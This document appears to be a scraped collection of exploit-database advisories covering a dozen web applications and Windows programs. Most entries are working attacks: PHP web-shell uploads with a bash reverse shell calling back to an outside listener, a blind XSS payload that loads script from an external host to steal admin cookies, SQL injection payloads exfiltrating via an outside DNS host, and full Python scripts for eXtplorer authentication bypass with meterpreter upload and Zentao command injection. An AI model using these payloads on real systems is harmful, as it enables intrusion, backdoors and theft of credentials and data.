ISHACK AI BOT

# Exploit Title: SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) # Date: 7th March 2022 # CVE ID: CVE-2022-26982 # Confirmed on release 2.1.1 # Vendor: https://download.simplemachines.org/ # Note- Once we insert the vulnerable php code, we can even execute it without any valid login as it is not required! We can use it as a backdoor! ############################################### #Step1- Login with Admin Credentials #Step2- Goto Admin=>Main=>Administration Center=>Configuration=>Themes and Layout=>Modify Themes=>Browse the templates and files in this theme.=>Admin.template.php #Step3- Now add the vulnerable php reverse tcp web shell exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4477 0>&1'"); ?> #Step4- Now Goto Add Media=>Add Resource=> Upload php web shell and click on SAVE CHANGES at the bottom of the page #Step5- Now click on "Themes and Layout" and you will get the reverse shell: E.g: Visit http://IP_ADDR/index.php?action=admin;area=theme;b4c2510f=bc6cde24d794569356b81afc98ede2c2 and get the reverse shell: listening on [any] 4477 ... connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 41276 bash: cannot set terminal process group (1334): Inappropriate ioctl for device bash: no job control in this shell daemon@debian:/opt/bitnami/simplemachinesforum$ whoami whoami daemon daemon@debian:/opt/bitnami/simplemachinesforum$ id id uid=1(daemon) gid=1(daemon) groups=1(daemon) daemon@debian:/opt/bitnami/simplemachinesforum$

# Exploit Title: Abantecart v1.3.2 - Authenticated Remote Code Execution # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) # Date: 3rd Mar'2022 # CVE ID: CVE-2022-26521 # Confirmed on release 1.3.2 # Vendor: https://www.abantecart.com/download ############################################### #Step1- Login with Admin Credentials #Step2- Uploading .php files is disabled by default hence we need to abuse the functionality: Goto Catalog=>Media Manager=>Images=>Edit=> Add php in Allowed file extensions #Step3- Now Goto Add Media=>Add Resource=> Upload php web shell #Step4- Copy the Resource URL location and execute it in the browser e.g. : Visit //IP_ADDR/resources/image/18/7a/4.php (Remove the //) and get the reverse shell: listening on [any] 4477 ... connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 34532 Linux debian 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64 GNU/Linux 11:17:51 up 2:15, 1 user, load average: 1.91, 1.93, 1.52 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT bitnami tty1 - 09:05 1:05m 0.20s 0.01s -bash uid=1(daemon) gid=1(daemon) groups=1(daemon) /bin/sh: 0: can't access tty; job control turned off $ whoami daemon $ id uid=1(daemon) gid=1(daemon) groups=1(daemon) $

# Exploit Title: MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) # Date: 26th Feb'2022 # CVE ID: CVE-2022-26149 # Confirmed on release 2.8.3-pl # Reference: https://github.com/sartlabs/0days/blob/main/Modx/Exploit.txt # Vendor: https://modx.com/download ############################################### #Step1- Login with Admin Credentials #Step2- Uploading .php files is disabled by default hence we need to abuse the functionality: Add the php file extension under the "Uploadable File Types" option available in "System Settings" #Step3- Now Goto Media=>Media Browser and upload the Shell.php #Step4- Now visit http://IP_Address/Shell.php and get the reverse shell: listening on [any] 4477 ... connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 58056 bash: cannot set terminal process group (1445): Inappropriate ioctl for device bash: no job control in this shell daemon@debian:/opt/bitnami/modx$

Exploit Title: PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS # Date: 2022-10-02 # Exploit Author: Prasheek Kamble # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/ # Version: V 1.2 # Vulnerable endpoint: http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php # Tested on MAC OS, XAMPP Steps to reproduce: 1) Navigate to http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php 2) Fill the form and Enter xss payload "><script src=https://prasheekk05.xss.ht></script> in address field 3) Click on Add Details and intercept the request in Burpsuite 4) After this, the details have been submitted. 5) As soon as admin(Victim) receives our request, when he clicks on it to verify our form, the XSS payload gets fired. 6) Now attacker get's the details of victim like ip address, cookies of Victim, etc 7) So attacker is sucessful in getting the victim's ip address and other details. #POC's https://ibb.co/kSxFp2g https://ibb.co/VvSVRsy https://ibb.co/mSGp4FX https://ibb.co/hXbJ9TZ https://ibb.co/M6vS08S

# Exploit Title: Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) # Date: 12th January,2022 # CVE ID: CVE-2021-46360 # Confirmed on release 10.0.39 using XAMPP on Ubuntu Linux 20.04.3 LTS # Reference: https://github.com/sartlabs/0days/blob/main/Composr-CMS/Exploit.py # Vendor: https://compo.sr/download.htm ############################################### #Step1- We should have the admin credentials, once we logged in, we can disable the php file uploading protection, you can also do this manually via Menu- Tools=>Commandr #!/usr/bin/python3 import requests from bs4 import BeautifulSoup import time cookies = { 'has_cookies': '1', 'PHPSESSID': 'ddf2e7c8ff1000a7c27b132b003e1f5c', #You need to change this as it is dynamic 'commandr_dir': 'L3Jhdy91cGxvYWRzL2ZpbGVkdW1wLw%3D%3D', 'last_visit': '1641783779', 'cms_session__b804794760e0b94ca2d3fac79ee580a9': 'ef14cc258d93a', #You need to change this as it is dynamic } headers = { 'Connection': 'keep-alive', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36', 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': '*/*', 'Origin': 'http://192.168.56.116', 'Referer': 'http://192.168.56.116/composr-cms/adminzone/index.php?page=admin-commandr', 'Accept-Language': 'en-US,en;q=0.9', } params = ( ('keep_session', 'ef14cc258d93a'), #You need to change this as it is dynamic ) data = { '_data': 'command=rm .htaccess', # This command will delete the .htaccess means disables the protection so that we can upload the .php extension file (Possibly the php shell) 'csrf_token': 'ef14cc258d93a' #You need to change this as it is dynamic } r = requests.post('http://192.168.56.116/composr-cms/data/commandr.php?keep_session=ef14cc258d93a', headers=headers, params=params, cookies=cookies, data=data, verify=False) soup = BeautifulSoup(r.text, 'html.parser') #datap=response.read() print (soup) #Step2- Now visit the Content=>File/Media Library and then upload any .php web shell ( #Step 3 Now visit http://IP_Address/composr-cms/uploads/filedump/php-reverse-shell.php and get the reverse shell: ┌─[ci@parrot]─[~] └──╼ $nc -lvvnp 4444 listening on [any] 4444 ... connect to [192.168.56.103] from (UNKNOWN) [192.168.56.116] 58984 Linux CVE-Hunting-Linux 5.11.0-44-generic #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux 13:35:13 up 20:11, 1 user, load average: 0.00, 0.01, 0.03 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT user :0 :0 Thu17 ?xdm? 46:51 0.04s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu uid=1(daemon) gid=1(daemon) groups=1(daemon) /bin/sh: 0: can't access tty; job control turned off $ whoami daemon $ id uid=1(daemon) gid=1(daemon) groups=1(daemon) $ pwd / $

## Exploit Title: Canteen-Management v1.0 - XSS-Reflected ## Exploit Author: nu11secur1ty ## Date: 10.04.2022 ## Vendor: Free PHP Projects & Ideas with Source Codes for Students | mayurik <https://www.mayurik.com/> ## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/Docs ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management ## Description: The name of an arbitrarily supplied URL parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can craft a very malicious HTTPS URL redirecting to a very malicious URL. When the victim clicks into this crafted URL the game will over for him. [+]Payload REQUEST: ```HTML GET /youthappam/login.php/lu555%22%3E%3Ca%20href=%22 https://pornhub.com/%22%20target=%22_blank%22%20rel=%22noopener%20nofollow%20ugc%22%3E%20%3Cimg%20src=%22https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif?token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1%22%20style=%22border:1px%20solid%20black;max-width:100%;%22%20alt=%22Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!%22%3E%20%3C/a%3Emv2me HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106", "Chromium";v="106" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 ``` [+]Payload RESPONSE: ```burp HTTP/1.1 200 OK Date: Tue, 04 Oct 2022 09:44:55 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 X-Powered-By: PHP/8.1.6 Set-Cookie: PHPSESSID=m1teao9b0j86ep94m6v7ek7fe6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 6140 Connection: close Content-Type: text/html; charset=UTF-8 <link rel="stylesheet" href="assets/css/popup_style.css"> <style> .footer1 { position: fixed; bottom: 0; width: 100%; color: #5c4ac7; text-align: center; } </style> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimal-ui"> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="description" content=""> <meta name="keywords" content=""> <meta name="author" content=""> <link rel="icon" type="image/png" sizes="16x16" href="assets/uploadImage/Logo/favicon.png"> <style type="text/css"> @media print { #printbtn { display : none; } } </style> <title>Youthappam Canteen Management System - by Mayuri K. Freelancer</title> <link href="assets/css/lib/chartist/chartist.min.css" rel="stylesheet"> <link href="assets/css/lib/owl.carousel.min.css" rel="stylesheet" /> <link href="assets/css/lib/owl.theme.default.min.css" rel="stylesheet" /> <link href="assets/css/lib/bootstrap/bootstrap.min.css" rel="stylesheet"> <link href="assets/css/helper.css" rel="stylesheet"> <link href="assets/css/style.css" rel="stylesheet"> <link rel="stylesheet" href="assets/css/lib/html5-editor/bootstrap-wysihtml5.css" /> <link href="assets/css/lib/calendar2/semantic.ui.min.css" rel="stylesheet"> <link href="assets/css/lib/calendar2/pignose.calendar.min.css" rel="stylesheet"> <link href="assets/css/lib/sweetalert/sweetalert.css" rel="stylesheet"> <link href="assets/css/lib/datepicker/bootstrap-datepicker3.min.css" rel="stylesheet"> <script type="text/javascript" src=" https://www.gstatic.com/charts/loader.js"></script> <script type="text/javascript"> google.charts.load("current", {packages:["corechart"]}); google.charts.setOnLoadCallback(drawChart); function drawChart() { var data = google.visualization.arrayToDataTable([ ['Food', 'Average sale per Day'], ['Masala dosa', 11], ['Chicken 65 ', 2], ['Karapu Boondi', 2], ['Bellam Gavvalu', 2], ['Gummadikaya Vadiyalu', 7] ]); var options = { title: 'Food Average Sale per Day', pieHole: 0.4, }; var chart = new google.visualization.PieChart(document.getElementById('donutchart')); chart.draw(data, options); } </script> </head> <body class="fix-header fix-sidebar"> <div id="page"></div> <div id="loading"></div> <div id="main-wrapper"> <div class="unix-login"> <div class="container-fluid" style="background-image: url('assets/myimages/background.jpg'); background-color: #ffffff;background-size:cover"> <div class="row"> <div class="col-lg-4 ml-auto"> <div class="login-content"> <div class="login-form"> <center><img src="./assets/uploadImage/Logo/logo.png" style="width: 100%;"></center><br> <form action="/youthappam/login.php/lu555"><a href="https:/pornhub.com/" target="_blank" rel="noopener nofollow ugc"> <img src="https:/ raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif" method="post" id="loginForm"> <div class="form-group"> <input type="text" name="username" id="username" class="form-control" placeholder="Username" required=""> </div> <div class="form-group"> <input type="password" id="password" name="password" class="form-control" placeholder="Password" required=""> </div> <button type="submit" name="login" class="f-w-600 btn btn-primary btn-flat m-b-30 m-t-30">Sign in</button> <!-- <div class="forgot-phone text-right f-right"> <a href="#" class="text-right f-w-600"> Forgot Password?</a> </div> --> <div class="forgot-phone text-left f-left"> <a href = "mailto:[email protected]?subject = Project Development Requirement&body = I saw your projects. I want to develop a project" class="text-right f-w-600"> Click here to contact me</a> </div> </form> </div> </div> </div> </div> </div> </div> </div> <script src="./assets/js/lib/jquery/jquery.min.js"></script> <script src="./assets/js/lib/bootstrap/js/popper.min.js"></script> <script src="./assets/js/lib/bootstrap/js/bootstrap.min.js"></script> <script src="./assets/js/jquery.slimscroll.js"></script> <script src="./assets/js/sidebarmenu.js"></script> <script src="./assets/js/lib/sticky-kit-master/dist/sticky-kit.min.js"></script> <script src="./assets/js/custom.min.js"></script> <script> function onReady(callback) { var intervalID = window.setInterval(checkReady, 1000); function checkReady() { if (document.getElementsByTagName('body')[0] !== undefined) { window.clearInterval(intervalID); callback.call(this); } } } function show(id, value) { document.getElementById(id).style.display = value ? 'block' : 'none'; } onReady(function () { show('page', true); show('loading', false); }); </script> </body> </html> ``` ## Reproduce: [href]( https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/mayuri_k/2022/Canteen-Management ) ## Proof and Exploit: [href](https://streamable.com/emg0zo) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

## Exploit Title: Canteen-Management v1.0 - SQL Injection ## Exploit Author: nu11secur1ty ## Date: 10.04.2022 ## Vendor: https://www.mayurik.com/ ## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi ## Description: The username parameter from Canteen-Management1.0-2022 appears to be vulnerable to SQL injection attacks. The malicious user can attack remotely this system by using this vulnerability to steal all information from the database of this system. STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: username=UvIiDwEB'+(select load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=UvIiDwEB'+(select load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND 'awEr'='awEr&password=h5F!l8j!Y6&login= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi) ## Proof and Exploit: [href](https://streamable.com/vvz2lh) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path # Exploit Author: Luis Martinez # Discovery Date: 2022-10-05 # Vendor Homepage: https://www.infonetsoftware.com # Software Link : https://www.infonetsoftware.com/soft/instalar_Medicont_x.exe # Tested Version: 3.7.27 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "medicont3" | findstr /i /v """ servermedicontservice servermedicontservice C:\Program Files (x86)\medicont3\servermedicontservice.exe Auto # Service info: C:\>sc qc "servermedicontservice" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: servermedicontservice TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START (DELAYED) ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\medicont3\servermedicontservice.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : servermedicontservice DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path # Exploit by: Luis Martinez # Discovery Date: 2022-10-05 # Vendor Homepage: https://www.gestionaleopen.org/ # Software Link : https://www.gestionaleopen.org/download/ # Tested Version: 12.00.00 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DB_GO_80" | findstr /i /v """ DB_GO_80 DB_GO_80 C:\Gestionale_Open\MySQL80\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL80\my.ini DB_GO_80 Auto # Service info: C:\>sc qc "DB_GO_80" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: DB_GO_80 TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Gestionale_Open\MySQL80\bin\mysqld.exe --defaults-file=C:\Gestionale_Open\MySQL80\my.ini DB_GO_80 LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : DB_GO_80 DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC) # Discovery by: Luis Martinez # Discovery Date: 2022-10-05 # Vendor Homepage: https://www.sysax.com/ # Software Link: https://www.sysax.com/download/sysaxserv_setup.msi # Tested Version: 6.95 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Pro x64 es # Steps to Produce the Crash: # 1.- Run python code: Sysax_Multi_Server_6.95.py # 2.- Open Sysax_Multi_Server_6.95.txt and copy content to clipboard # 3.- Open "Sysax Multi Server" # 4.- Manage Server Settings... # 5.- Administrative Settings -> Configure... # 6.- Clic "Enable web based administration and API access" # 7.- Login -> admin # 8.- Paste ClipBoard on "Password" # 9.- Save # 10.- Crashed #!/usr/bin/env python buffer = "\x41" * 800 f = open ("Sysax_Multi_Server_6.95.txt", "w") f.write(buffer) f.close()

# Exploit Title: eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE) # Exploit Author: ErPaciocco # Author Website: https://erpaciocco.github.io # Vendor Homepage: https://extplorer.net/ # # Vendor: # ============== # extplorer.net # # Product: # ================== # eXtplorer <= v2.1.14 # # eXtplorer is a PHP and Javascript-based File Manager, it allows to browse # directories, edit, copy, move, delete, # search, upload and download files, create & extract archives, create new # files and directories, change file # permissions (chmod) and more. It is often used as FTP extension for popular # applications like Joomla. # # Vulnerability Type: # ====================== # Authentication Bypass (& Remote Command Execution) # # # Vulnerability Details: # ===================== # # eXtplorer authentication mechanism allows an attacker # to login into the Admin Panel without knowing the password # of the victim, but only its username. This vector is exploited # by not supplying password in POST request. # # # Tested on Windows # # # Reproduction steps: # ================== # # 1) Navigate to Login Panel # 2) Intercept authentication POST request to /index.php # 3) Remove 'password' field # 4) Send it and enjoy! # # # Exploit code(s): # =============== # # Run below PY script from CLI... # # [eXtplorer_auth_bypass.py] # # Proof Of Concept try: import requests except: print(f"ERROR: RUN: pip install requests") exit() import sys import time import urllib.parse import re import random import string import socket import time import base64 TARGET = None WORDLIST = None _BUILTIN_WL = [ 'root', 'admin', 'test', 'guest', 'info', 'adm', 'user', 'administrator' ] _HOST = None _PATH = None _SESSION = None _HEADERS = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 'Accept-Language': 'it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3', 'Accept-Encoding': 'gzip, deflate, br', 'Connection': 'keep-alive' } def detect(): global _HOST global _PATH global _SESSION global _HEADERS _HOST = TARGET[0].split(':')[0] + '://' + TARGET[0].split('/')[2] _PATH = '/'.join(TARGET[0].split('/')[3:]).rstrip('/') _SESSION = requests.Session() raw = _SESSION.get(f"{_HOST}/{_PATH}/extplorer.xml", headers=_HEADERS, verify=False) if raw.status_code == 200: ver = re.findall("<version>(((\d+)\.?)+)<\/version>", raw.text, re.MULTILINE) if int(ver[0][2]) < 15: return True return False def auth_bypass(): global _HOST global _PATH global _SESSION global _HEADERS global WORDLIST global _BUILTIN_WL _HEADERS['X-Requested-With'] = 'XMLHttpRequest' params = {'option': 'com_extplorer', 'action': 'login', 'type': 'extplorer', 'username': 'admin', 'lang':'english'} if WORDLIST != None: if WORDLIST == _BUILTIN_WL: info(f"Attempting to guess an username from builtin wordlist") wl = _BUILTIN_WL else: info(f"Attempting to guess an username from wordlist: {WORDLIST[0]}") with open(WORDLIST[0], "r") as f: wl = f.read().split('\n') for user in wl: params = {'option': 'com_extplorer', 'action': 'login', 'type': 'extplorer', 'username': user, 'lang':'english'} info(f"Trying with {user}") res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False) if "successful" in res.text: return (user) else: res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False) if "successful" in res.text: return ('admin') return False def rce(): global _HOST global _PATH global _SESSION global _HEADERS global _PAYLOAD tokenReq = _SESSION.get(f"{_HOST}/{_PATH}/index.php?option=com_extplorer&action=include_javascript&file=functions.js") token = re.findall("token:\s\"([a-f0-9]{32})\"", tokenReq.text)[0] info(f"CSRF Token obtained: {token}") payload = editPayload() info(f"Payload edited to fit local parameters") params = {'option': 'com_extplorer', 'action': 'upload', 'dir': f"./{_PATH}", 'requestType': 'xmlhttprequest', 'confirm':'true', 'token': token} name = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6)) files = {'userfile[0]':(f"{name}.php", payload)} req = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, files=files, verify=False) if "successful" in req.text: info(f"File {name}.php uploaded in root dir") info(f"Now set a (metasploit) listener and go to: {_HOST}/{_PATH}/{name}.php") def attack(): if not TARGET: error("TARGET needed") if TARGET: if not detect(): error("eXtplorer vulnerable instance not found!") exit(1) else: info("eXtplorer endpoint is vulnerable!") username = auth_bypass() if username: info("Auth bypassed!") rce() else: error("Username 'admin' not found") def error(message): print(f"[E] {message}") def info(message): print(f"[I] {message}") def editPayload(): # You can generate payload with msfvenom and paste below base64 encoded result # msfvenom -p php/meterpreter_reverse_tcp LHOST=<yourIP> LPORT=<yourPORT> -f base64 return base64.b64decode("PD9waHAgZWNobyAiSEFDS0VEISI7ICA/Pg==") def help(): print(r"""eXtplorer <= 2.1.14 exploit - Authentication Bypass & Remote Code Execution Usage: python3 eXtplorer_auth_bypass.py -t <target-host> [-w <userlist>] [-wb] Options: -t Target host. Provide target IP address (and optionally port). -w Wordlist for user enumeration and authentication (Optional) -wb Use built-in wordlist for user enumeration (Optional) -h Show this help menu. """) return True args = {"t" : (1, lambda *x: (globals().update(TARGET = x[0]))), "w" : (1, lambda *x: (globals().update(WORDLIST = x[0]))), "wb": (0, lambda *x: (globals().update(WORDLIST = _BUILTIN_WL))), "h" : (0, lambda *x: (help() and exit(0)))} if __name__ == "__main__": i = 1 [ args[ arg[1:]][1](sys.argv[i+1: (i:=i+1+args[arg[1:]][0]) ]) for arg in [k for k in sys.argv[i:] ] if arg[0] == '-' ] attack() else: help() # /////////////////////////////////////////////////////////////////////// # [Script examples] # # # c:\>python eXtplorer_auth_bypass.py -t https://target.com # c:\>python eXtplorer_auth_bypass.py -t http://target.com:1234 -w wordlist.txt # c:\>python eXtplorer_auth_bypass.py -t http://target.com -wb # Exploitation Method: # ====================== # Remote # [+] Disclaimer # The information contained within this advisory is supplied "as-is" with no # warranties or guarantees of fitness of use or otherwise. # Permission is hereby granted for the redistribution of this advisory, # provided that it is not altered except by reformatting it, and # that due credit is given. Permission is explicitly given for insertion in # vulnerability databases and similar, provided that due credit # is given to the author. The author is not responsible for any misuse of the # information contained herein and accepts no responsibility # for any damage caused by the use or misuse of this information.

# Exploit Title: FlatCore CMS 2.1.1 -Stored Cross Site Scripting # Date: 2020-09-24 # Exploit Author: Sinem Şahin # Vendor Homepage: https://flatcore.org/ # Version: 2.1.1 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Go to the following url. => http://(HOST)/install/index.php 2- Write XSS Payload into the username of the user account. 3- Press "Save" button. XSS Payload ==> "<script>alert("usernameXSS")</script>

# Exploit Title: Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE) # Exploit Author: mister0xf # Date: 2022-10-8 # Software Link: https://github.com/easysoft/zentaopms # Version: tested on 17.0 (probably works also on newer/older versions) # Tested On: Kali Linux 2022.2 # Exploit Tested Using: Python 3.10.4 # Vulnerability Description: # Zentao Project Management System 17.0 suffers from an authenticated command injection allowing # remote attackers to obtain Remote Code Execution (RCE) on the hosting webserver # Vulnerable Source Code: # /module/repo/model.php: # [...] # $client = $this->post->client; // <-- client is taken from the POST request # [...] # elseif($scm == 'Git') # { # if(!is_dir($path)) # { # dao::$errors['path'] = sprintf($this->lang->repo->error->noFile, $path); # return false; # } # # if(!chdir($path)) # { # if(!is_executable($path)) # { # dao::$errors['path'] = sprintf($this->lang->repo->error->noPriv, $path); # return false; # } # dao::$errors['path'] = $this->lang->repo->error->path; # return false; # } # # $command = "$client tag 2>&1"; // <-- command is injected here # exec($command, $output, $result); import requests,sys import hashlib from urllib.parse import urlparse from bs4 import BeautifulSoup def banner(): print(''' ::::::::: :::::::::: :::: ::: :::::::: ::::::::::: ::: :::::::: :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +#+ +#++:++# +#+ +:+ +#+ +#+ +#+ +#++:++#++: +#+ +:+ +#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+ #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+# ######### ########## ### #### ######## ########### ### ### ######## ''') def usage(): print('Usage: zenciao user password http://127.0.0.1/path') def main(): if ((len(sys.argv)-1) != 3): usage() banner() exit() #proxy = {'http':'http://127.0.0.1:8080'} banner() username = sys.argv[1] password = sys.argv[2] target = sys.argv[3] # initialize session object session = requests.session() home_url = target+'/index.php' rand_url = target+'/index.php?m=user&f=refreshRandom&t=html' login_url = target+'/index.php?m=user&f=login&t=html' create_repo_url = target+'/index.php?m=repo&f=create&objectID=0' r1 = session.get(home_url) soup = BeautifulSoup(r1.text, "html.parser") script_tag = soup.find('script') redirect_url = script_tag.string.split("'")[1] r2 = session.get(target+redirect_url) # get random value session.headers.update({'X-Requested-With': 'XMLHttpRequest'}) res = session.get(rand_url) rand = res.text # compute md5(md5(password)+rand) md5_pwd = hashlib.md5((hashlib.md5(password.encode()).hexdigest()+str(rand)).encode()) # login request post_data = {"account":username,"password":md5_pwd.hexdigest(),"passwordStrength":1,"referer":"/zentaopms/www/","verifyRand":rand,"keepLogin":0,"captcha":""} my_referer = target+'/zentaopms/www/index.php?m=user&f=login&t=html' session.headers.update({'Referer': my_referer}) session.headers.update({'X-Requested-With': 'XMLHttpRequest'}) response = session.post(login_url, data=post_data) # exploit rce # devops repo page r2 = session.get(create_repo_url) git_test_dir = '/home/' command = 'whoami;' exploit_post_data = {"SCM":"Git","name":"","path":git_test_dir,"encoding":"utf-8","client":command,"account":"","password":"","encrypt":"base64","desc":""} r3 = session.post(create_repo_url, data=exploit_post_data) print(r3.content) if __name__ == '__main__': main()

